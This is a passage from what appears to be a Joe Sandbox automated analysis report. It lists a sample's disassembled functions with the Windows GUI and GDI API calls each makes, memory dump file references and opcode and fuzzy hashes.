                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B119CF0BA8704A6D3A066649D47FDA7170AF90B05FB18A1B778F359C5CBEC3041668E
                                                                                                                                                                                                                                                                                    Function 00420AA0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000000B,00000000,00000000), ref: 00420AB8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101D,00000005,00000000), ref: 00420ACA
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001207,00000006,?), ref: 00420AE9
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00420AFB
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00000005), ref: 00420B28
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00420B37
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$ClientRect
                                                                                                                                                                                                                                                                                    • String ID: Button_Check
                                                                                                                                                                                                                                                                                    • API String ID: 1925248871-1860365581
                                                                                                                                                                                                                                                                                    • Opcode ID: 2dbc91605b07778e48ee4b1ccc5bb52471f65858b054350958406698a8df70d5
                                                                                                                                                                                                                                                                                    • Instruction ID: f6960d58b42149bb48d8704757dd9bea0314272504ba79e98d6d7c5fe9983159
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2dbc91605b07778e48ee4b1ccc5bb52471f65858b054350958406698a8df70d5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC115E717403057BE235EA79CC86FA773E9AB88B40F41491CF285EB1C1DAB9F9448B54
                                                                                                                                                                                                                                                                                    Function 00453220 Relevance: 12.3, APIs: 8, Instructions: 266COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: e733c2cee5cbb5377ac2072c21b29c4e9d8b7a1ab7a7561ec9f277c12a0121fb
                                                                                                                                                                                                                                                                                    • Instruction ID: 04dbbea40edafa167825a5640816ee55d2e105094fff44b6784cacd96e044d36
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e733c2cee5cbb5377ac2072c21b29c4e9d8b7a1ab7a7561ec9f277c12a0121fb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47B136716083409FC310DF69C884A1BFBE9BFC9714F24895EE99887362D774E949CB92
                                                                                                                                                                                                                                                                                    Function 004657C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00467820: DeleteObject.GDI32(00000000), ref: 00467935
                                                                                                                                                                                                                                                                                    • GdiplusShutdown.GDIPLUS(?,?,BB40E64E,00093C38,?,?,?,?,00000000,0047812F,000000FF,0041A4F1,BB40E64E,00093C38), ref: 00465814
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004658CF
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00465921
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00465973
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004659C5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DeleteObject$GdiplusShutdown
                                                                                                                                                                                                                                                                                    • String ID: 8K
                                                                                                                                                                                                                                                                                    • API String ID: 1337965791-3211281232
                                                                                                                                                                                                                                                                                    • Opcode ID: 17216591ef9b180b25b2aa9ddde3603ed2100cc8580b4b92498784189749eb6b
                                                                                                                                                                                                                                                                                    • Instruction ID: 5b8780734ed73be5f4f2893b0bea8a6c3b62fc8eaf033f1e837d6edea0f0e4aa
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17216591ef9b180b25b2aa9ddde3603ed2100cc8580b4b92498784189749eb6b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8361E6B0505F409FC360DF3A9880B9BFBE4BB48305F90492EE1AE93241DB796548CF5A
                                                                                                                                                                                                                                                                                    Function 00416960 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • OpenThemeData.UXTHEME(?,LISTVIEW,00000001), ref: 00416A0B
                                                                                                                                                                                                                                                                                    • DrawThemeBackground.UXTHEME(?,?,00000006,00000002,?,00000000,?,00FFFFFF), ref: 00416A5D
                                                                                                                                                                                                                                                                                    • CloseThemeData.UXTHEME(?), ref: 00416A68
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00416A89
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416430: GetWindowRect.USER32(?,?), ref: 00416443
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416430: InflateRect.USER32(?,00000002,00000002), ref: 00416452
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416430: GetParent.USER32(?), ref: 00416467
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416430: GetParent.USER32(?), ref: 0041647A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416430: InvalidateRect.USER32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00478B80,000000FF,00416365), ref: 0041648D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: RectTheme$DataParent$BackgroundCloseDrawInflateInvalidateMessageOpenSendWindow
                                                                                                                                                                                                                                                                                    • String ID: 8F$LISTVIEW
                                                                                                                                                                                                                                                                                    • API String ID: 2600991427-1963048992
                                                                                                                                                                                                                                                                                    • Opcode ID: 0229e11747b3cd2e378b549adb87a154061692a6bd490272b80820133ddceee6
                                                                                                                                                                                                                                                                                    • Instruction ID: fa80797a93d1b306fb8333d11dc9e085901b6c38828278b42b81b7196f356a38
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0229e11747b3cd2e378b549adb87a154061692a6bd490272b80820133ddceee6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 415106B56083009FC314DF68C981A6BB7E9FF88744F108A2EF59987390D778E945CB96
                                                                                                                                                                                                                                                                                    Function 004293B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 129windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ActiveMessageWindow
                                                                                                                                                                                                                                                                                    • String ID: 3400001$3400101$3401090$rY
                                                                                                                                                                                                                                                                                    • API String ID: 3610105657-3605576623
                                                                                                                                                                                                                                                                                    • Opcode ID: 9be5c9983a3a9708faa268995b4b90c9b7baec8167950ea82a948411bb73ca8a
                                                                                                                                                                                                                                                                                    • Instruction ID: 6a8541e3f689305ec2f6cb5d2be3b4f28d8c1de2ea2bbd417e2b40b4f34285ca
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9be5c9983a3a9708faa268995b4b90c9b7baec8167950ea82a948411bb73ca8a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B44193B1704210ABD710EB65EC45BAB73A8AF94704F40892FF90ED2290DB78ED45C76D
                                                                                                                                                                                                                                                                                    Function 005FD940 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 005FD977
                                                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 005FD97F
                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 005FDA08
                                                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 005FDA33
                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 005FDA88
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                    • Opcode ID: 4864904ac64cda9a927aff4a51afae6c5f1078354c3c70f1066ae3651d2a4d7e
                                                                                                                                                                                                                                                                                    • Instruction ID: c3ed1502691b9c8b972983a24ed3c6198c6f2432814e13c286f68de9a2a10917
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4864904ac64cda9a927aff4a51afae6c5f1078354c3c70f1066ae3651d2a4d7e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9541A134A0020DAFCF10DF68C885ABEBFB7BF45314F148055EA55AB392D7799A11CBA1
                                                                                                                                                                                                                                                                                    Function 00467490 Relevance: 10.6, APIs: 7, Instructions: 118windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004674EB
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 004674FB
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0046751B
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 0046752A
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00467561
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0046758A
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 004675DC
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreateParentRect$BitmapClientWindow
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1335343179-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ae058cf5547a5b73137727556229a9f4d12eeb23d99a6f799289078dd219408d
                                                                                                                                                                                                                                                                                    • Instruction ID: ec974f87df7e9fb3a3618fae45b6badb24d167debaf80877d84b9ed91747ca3a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae058cf5547a5b73137727556229a9f4d12eeb23d99a6f799289078dd219408d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D411AB1508740AFC315DF68C985E5BBBE8FBD8714F008A1EF59A93290DB74E844CB66
                                                                                                                                                                                                                                                                                    Function 0042E730 Relevance: 10.6, APIs: 7, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _TrackMouseEvent.COMCTL32(00000010), ref: 0042E774
                                                                                                                                                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 0042E7A7
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0042E7C2
                                                                                                                                                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 0042E7FC
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,?,00000000,00000105), ref: 0042E821
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,?,00000000,00000105), ref: 0042E83C
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0042E84F
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: RectRedrawWindow$ClientEventMouseTrack
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4196163336-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 54eeda5e9cc18010a30806788d475c85a44e97beb02a1b7b18afe2bd2e815317
                                                                                                                                                                                                                                                                                    • Instruction ID: c4f66d3cff0941ef47ae988eb42254fc96aed82a1b76600b02dc3c2c7e15cd00
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54eeda5e9cc18010a30806788d475c85a44e97beb02a1b7b18afe2bd2e815317
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F03127B15047059FD314DF69D880AABBBE9FB88314F044A2EF59A83350E770E944CFA6
                                                                                                                                                                                                                                                                                    Function 00423340 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 00423369
                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001), ref: 00423448
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00423452
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ErrorForegroundIconLastNotifyShell_Window
                                                                                                                                                                                                                                                                                    • String ID: $>$3401082$3401083
                                                                                                                                                                                                                                                                                    • API String ID: 4150770455-2005305407
                                                                                                                                                                                                                                                                                    • Opcode ID: 7028775615fcb4f910a592c69760713685972df336b13bea8f76cfa9de920131
                                                                                                                                                                                                                                                                                    • Instruction ID: 90de86b5fd52155df775e515d11431d32a4523fc17091ff82a2e95fa86d8e88e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7028775615fcb4f910a592c69760713685972df336b13bea8f76cfa9de920131
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2317EB1644301ABD310DF64DC4AFABB7E4FF44710F10892EF65EA2290DBB9A544CB99
                                                                                                                                                                                                                                                                                    Function 00432E40 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 00432EB2
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,-00000002,00000002), ref: 00432EF5
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,-00000002,00000000), ref: 00432F33
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402077$3402078$3402079
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-670106401
                                                                                                                                                                                                                                                                                    • Opcode ID: 1e581721c84f0c249b880909b493c1dbc8988a95a366e13f64cc3adfbf7eb187
                                                                                                                                                                                                                                                                                    • Instruction ID: c04858277577f06559cf2ee2803e4bbf63125390443237cb6e41332b9df5dc51
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e581721c84f0c249b880909b493c1dbc8988a95a366e13f64cc3adfbf7eb187
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A2183B56947406BD321DF50CD86FAB73A8EB88B11F10491FF31EA25C0CAA8A804976D
                                                                                                                                                                                                                                                                                    Function 004262A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74stringCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
